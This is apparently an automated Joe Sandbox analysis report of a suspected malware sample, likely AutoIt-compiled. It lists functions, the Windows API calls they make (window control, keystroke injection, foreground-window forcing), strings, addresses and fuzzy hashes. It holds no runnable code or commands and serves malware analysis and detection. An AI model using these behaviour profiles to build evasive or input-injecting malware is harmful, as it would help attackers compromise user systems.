Source File: 00000000.00000002.1324703265.000000000171D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0171D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_171d000_bwYw3UUfy7.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction ID: b1503a7741d1a08bf66c49bcfa2f813b9bcae57c92d42ae02600b20528033595
Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction Fuzzy Hash: D5D0A73094520CEBCB20CFFCDC089DAB3A8DB05320F004754FD19C3281D531A9409B50

Function 00731CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00731CBC

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: e8108a895b8bc0f26189de77117f29123473f3d33af696fd847780a2867caf89
Instruction ID: 5b4c3dd7a7b5e350e99bb18b25b0c1c6983a0ef34cf8018f2def08ab19c73e9f
Opcode Fuzzy Hash: e8108a895b8bc0f26189de77117f29123473f3d33af696fd847780a2867caf89
Instruction Fuzzy Hash: 43C09236280304AFF7958B80BC4EF107768B348B10F148001F60DA96E3C3E66821EA58

Function 0171F260 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 0171F271

Memory Dump Source

Source File: 00000000.00000002.1324703265.000000000171D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0171D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_171d000_bwYw3UUfy7.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: ad2951ed19893588808f85c238f6873d510663fc5585eced3868d885b187ca38
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 6BE0BF7498410D9FDB00EFA8D54969E7BB4EF04301F100261FD01D2281D63099508A62

Non-executed Functions

Function 007C9576 Relevance: 67.1, APIs: 36, Strings: 2, Instructions: 625windowkeyboardnativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00749BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00749BB2

NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?), ref: 007C961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007C965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 007C969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007C96C9
SendMessageW.USER32 ref: 007C96F2
GetKeyState.USER32(00000011), ref: 007C978B
GetKeyState.USER32(00000009), ref: 007C9798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007C97AE
GetKeyState.USER32(00000010), ref: 007C97B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007C97E9
SendMessageW.USER32 ref: 007C9810
SendMessageW.USER32(?,00001030,?,007C7E95), ref: 007C9918
SetCapture.USER32(?), ref: 007C994A
ClientToScreen.USER32(?,?), ref: 007C99AF
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007C99D6
ReleaseCapture.USER32 ref: 007C99E1
GetCursorPos.USER32(?), ref: 007C9A19
ScreenToClient.USER32(?,?), ref: 007C9A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 007C9A80
SendMessageW.USER32 ref: 007C9AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 007C9AEB
SendMessageW.USER32 ref: 007C9B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 007C9B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 007C9B4A
GetCursorPos.USER32(?), ref: 007C9B68
ScreenToClient.USER32(?,?), ref: 007C9B75
GetParent.USER32(?), ref: 007C9B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 007C9BFA
SendMessageW.USER32 ref: 007C9C2B
ClientToScreen.USER32(?,?), ref: 007C9C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 007C9CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 007C9CDE
SendMessageW.USER32 ref: 007C9D01
ClientToScreen.USER32(?,?), ref: 007C9D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 007C9D82

Part of subcall function 00749944: GetWindowLongW.USER32(?,000000EB), ref: 00749952

GetWindowLongW.USER32(?,000000F0), ref: 007C9E05

Strings

F, xrefs: 007C9D07
@GUI_DRAGID, xrefs: 007C997D

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: MessageSend$ClientScreen$LongWindow$State$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease
String ID: @GUI_DRAGID$F
API String ID: 1312020300-4164748364
Opcode ID: f2f93349f74d078f978024d6d2325defee7fead1697e35cb72a83c59bed89be1
Instruction ID: 62f9d7731270862d412d24ec8fe351d337bbe88ef067e828e5b71cc898120687
Opcode Fuzzy Hash: f2f93349f74d078f978024d6d2325defee7fead1697e35cb72a83c59bed89be1
Instruction Fuzzy Hash: AB427735204201EFDB65CF24CC88FAABBE5FF48320F10465DF699A72A1D739A960CB51

Function 007C4873 Relevance: 61.8, APIs: 33, Strings: 2, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 007C48F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 007C4908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 007C4927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 007C494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 007C495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 007C497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 007C49AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 007C49D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 007C4A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 007C4A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 007C4A7E
IsMenu.USER32(?), ref: 007C4A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007C4AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007C4B20
GetWindowLongW.USER32(?,000000F0), ref: 007C4B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 007C4BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 007C4C82
wsprintfW.USER32 ref: 007C4CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007C4CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 007C4CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 007C4D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007C4D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 007C4D5A

Strings

%d/%02d/%02d, xrefs: 007C4CA8
0, xrefs: 007C4AC2

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d$0
API String ID: 4054740463-4206205729
Opcode ID: 814ff483b41787ace18327663311391dbd5b46463ff40611878f6746798cc9d6
Instruction ID: 059dc4c423ca874bc2bc5ef6f4131df0773175f3a213782c4b052d1c36651735
Opcode Fuzzy Hash: 814ff483b41787ace18327663311391dbd5b46463ff40611878f6746798cc9d6
Instruction Fuzzy Hash: 5E12EE71A00214ABEB258F28CC59FAE7BF8FF45310F14816DF51AEA2E1DB789941CB50

Function 0074F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0074F998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0078F474
IsIconic.USER32(00000000), ref: 0078F47D
ShowWindow.USER32(00000000,00000009), ref: 0078F48A
SetForegroundWindow.USER32(00000000), ref: 0078F494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0078F4AA
GetCurrentThreadId.KERNEL32 ref: 0078F4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0078F4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 0078F4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0078F4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0078F4DE
SetForegroundWindow.USER32(00000000), ref: 0078F4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 0078F4F6
keybd_event.USER32(00000012,00000000), ref: 0078F501
MapVirtualKeyW.USER32(00000012,00000000), ref: 0078F50B
keybd_event.USER32(00000012,00000000), ref: 0078F510
MapVirtualKeyW.USER32(00000012,00000000), ref: 0078F519
keybd_event.USER32(00000012,00000000), ref: 0078F51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 0078F528
keybd_event.USER32(00000012,00000000), ref: 0078F52D
SetForegroundWindow.USER32(00000000), ref: 0078F530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 0078F557

Strings

Shell_TrayWnd, xrefs: 0078F46F

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 761ade202f0e13d111b648ecced153c47aaa885d47a1766132341d06f6498b84
Instruction ID: 786708a23e3b58aa05f5b003112b2e70d03ad73bdf514e9d4bbc83c1832ac229
Opcode Fuzzy Hash: 761ade202f0e13d111b648ecced153c47aaa885d47a1766132341d06f6498b84
Instruction Fuzzy Hash: 3A316371A80218BBEB216BB55C4AFBF7F6CEB44B50F20406AF605F61D1C7B85D10AB64

Function 007C911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfilenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00749BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00749BB2

DragQueryPoint.SHELL32(?,?), ref: 007C9147

Part of subcall function 007C7674: ClientToScreen.USER32(?,?), ref: 007C769A
Part of subcall function 007C7674: GetWindowRect.USER32(?,?), ref: 007C7710
Part of subcall function 007C7674: PtInRect.USER32(?,?,007C8B89), ref: 007C7720

SendMessageW.USER32(?,000000B0,?,?), ref: 007C91B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007C91BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007C91DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 007C9225
SendMessageW.USER32(?,000000B0,?,?), ref: 007C923E
SendMessageW.USER32(?,000000B1,?,?), ref: 007C9255
SendMessageW.USER32(?,000000B1,?,?), ref: 007C9277
DragFinish.SHELL32(?), ref: 007C927E
NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 007C9371

Strings

@GUI_DROPID, xrefs: 007C929E
@GUI_DRAGFILE, xrefs: 007C9320
@GUI_DRAGID, xrefs: 007C92E9

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 4085959399-3440237614
Opcode ID: e1100c296e5faf1748a2845c7f1b4b756e26206a90396c068a102d7645ba127c
Instruction ID: b226f5c77a882f3bc709520c1c7cd8f9f6e811c2d990f088284f3f9ab52cb1d5
Opcode Fuzzy Hash: e1100c296e5faf1748a2845c7f1b4b756e26206a90396c068a102d7645ba127c
Instruction Fuzzy Hash: 7C617C71108301AFD705DF64DC89EAFBBE8FF88750F00491EF695922A1DB749A49CB62

Function 0074AFAC Relevance: 19.6, Strings: 15, Instructions: 881COMMON

Download Yara Rule

Strings

UTF16), xrefs: 00787F5E
CRLF), xrefs: 00788156
UCP), xrefs: 00787F9C
LF), xrefs: 00788139
BSR_ANYCRLF), xrefs: 007881B5
ANYCRLF), xrefs: 00788190
NO_START_OPT), xrefs: 00787FDE
4100f14100f14100b14100814100614100514100014100014100014100014100014100014100614100614100814100914100814100514100314100a14100f14100, xrefs: 0074B073
ANY), xrefs: 00788173
UTF), xrefs: 00787F89
NO_AUTO_POSSESS), xrefs: 00787FBD
CR), xrefs: 0078811C
LIMIT_RECURSION=, xrefs: 0078809A
LIMIT_MATCH=, xrefs: 00787FFF
BSR_UNICODE), xrefs: 007881CF

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID:
String ID: 4100f14100f14100b14100814100614100514100014100014100014100014100014100014100614100614100814100914100814100514100314100a14100f14100$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-3764116346
Opcode ID: b35f687120b4ceafcc50583052be513380226d893b665a6b0ca57115cef16161
Instruction ID: 659e86b02ee91816fed6b998966651807c31b68861e169ed105ab76761f84ccc
Opcode Fuzzy Hash: b35f687120b4ceafcc50583052be513380226d893b665a6b0ca57115cef16161
Instruction Fuzzy Hash: 0E72D471E40219DBDB54DF59C8807BEB7B5FF48310F64816AE909EB281EB389D81CB91

Function 007C8D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windownativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00749BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00749BB2

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007C8D5A
GetFocus.USER32 ref: 007C8D6A
GetDlgCtrlID.USER32(00000000), ref: 007C8D75
NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 007C8E1D
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 007C8ECF
GetMenuItemCount.USER32(?), ref: 007C8EEC
GetMenuItemID.USER32(?,00000000), ref: 007C8EFC
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 007C8F2E
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 007C8F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007C8FA1

Strings

0, xrefs: 007C8E9F

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow
String ID: 0
API String ID: 1669892757-4108050209
Opcode ID: ec46dbf27f8d97a634a0924e2d2dfb16d1cfc6006eee1b3e22c457a89c72a90d
Instruction ID: 966c6dfc001165b417d40c5591da4e2e68a69b79cfca0e67e44dd02bfcf02526
Opcode Fuzzy Hash: ec46dbf27f8d97a634a0924e2d2dfb16d1cfc6006eee1b3e22c457a89c72a90d
Instruction Fuzzy Hash: 0481B071508301AFDB51CF24D888FABBBE9FB88314F14095DF99997291DB78D901CBA2

Function 007C9F86 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 260windownativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00749BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00749BB2

GetSystemMetrics.USER32(0000000F), ref: 007C9FC7
GetSystemMetrics.USER32(0000000F), ref: 007C9FE7
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 007CA224
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 007CA242
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 007CA263
ShowWindow.USER32(00000003,00000000), ref: 007CA282
InvalidateRect.USER32(?,00000000,00000001), ref: 007CA2A7
NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 007CA2CA

Strings

, xrefs: 007CA1D8

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$DialogInvalidateLongMoveNtdllProc_RectShow
String ID:
API String ID: 830902736-3916222277
Opcode ID: f1119248989409174fa628d44e305d1ec5c0de4191f2280d79f5e5b69a99a49b
Instruction ID: 38f9cf8a1e9efea08bfdc8c0e1cbe9e37101036d17508f98684ae2a0bea35847
Opcode Fuzzy Hash: f1119248989409174fa628d44e305d1ec5c0de4191f2280d79f5e5b69a99a49b
Instruction Fuzzy Hash: D3B1CD31600219EFDF14CF68C989BAE7BB2FF84706F08806DED499B295D739A940CB51

Function 007C8B02 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 149nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00749BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00749BB2

Part of subcall function 0074912D: GetCursorPos.USER32(?), ref: 00749141
Part of subcall function 0074912D: ScreenToClient.USER32(00000000,?), ref: 0074915E
Part of subcall function 0074912D: GetAsyncKeyState.USER32(00000001), ref: 00749183
Part of subcall function 0074912D: GetAsyncKeyState.USER32(00000002), ref: 0074919D

ReleaseCapture.USER32 ref: 007C8B77
SetWindowTextW.USER32(?,00000000), ref: 007C8C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 007C8C25
NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 007C8CFF

Strings

@GUI_DROPID, xrefs: 007C8C51
@GUI_DRAGFILE, xrefs: 007C8C9A

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 973565025-2107944366
Opcode ID: 7402b79d168f617e584e79f484d8f9673137fc28fbbd9a3d3c0486598013c903
Instruction ID: da224d8f8e570d40c28a2e978110d0286c6382c2eb41b2bb6ad88f665a7af3f2
Opcode Fuzzy Hash: 7402b79d168f617e584e79f484d8f9673137fc28fbbd9a3d3c0486598013c903
Instruction Fuzzy Hash: E9518D71104304AFE754DF24DC9AFAA77E4FB88710F40062DFA56A72E2CB789944CB62

Function 0074912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00749141
ScreenToClient.USER32(00000000,?), ref: 0074915E
GetAsyncKeyState.USER32(00000001), ref: 00749183
GetAsyncKeyState.USER32(00000002), ref: 0074919D

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
